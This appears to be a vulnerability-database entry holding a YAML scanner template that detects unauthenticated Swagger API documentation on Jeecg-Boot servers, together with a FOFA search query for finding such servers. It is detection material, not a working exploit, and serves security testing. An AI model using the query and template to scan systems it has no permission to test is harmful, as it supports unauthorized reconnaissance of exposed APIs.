jeecg-boot-unauth: Jeecg Boot Unauth

2025-08-01 jeecg boot PoC Public

Description

fofa: title="Jeecg-Boot"

PoC

id: jeecg-boot-unauth

info:
  name: Jeecg Boot Unauth
  author: zan8in
  severity: high
  verified: true
  description: |-
    fofa: title="Jeecg-Boot"
  tags: jeecg,boot,unauth
  created: 2023/07/07

rules:
  r0:
    request:
      method: GET
      path: /jeecg-boot/
    expression: response.status == 200 && response.body.bcontains(b'<title>Swagger-Bootstrap-UI</title>')
  r1:
    request:
      method: GET
      path: /jeecg-boot/swagger-resources
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"name":') &&
      response.body.bcontains(b'"url":') &&
      response.body.bcontains(b'"swaggerVersion":') &&
      response.body.bcontains(b'"location":')
expression: r0() || r1()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities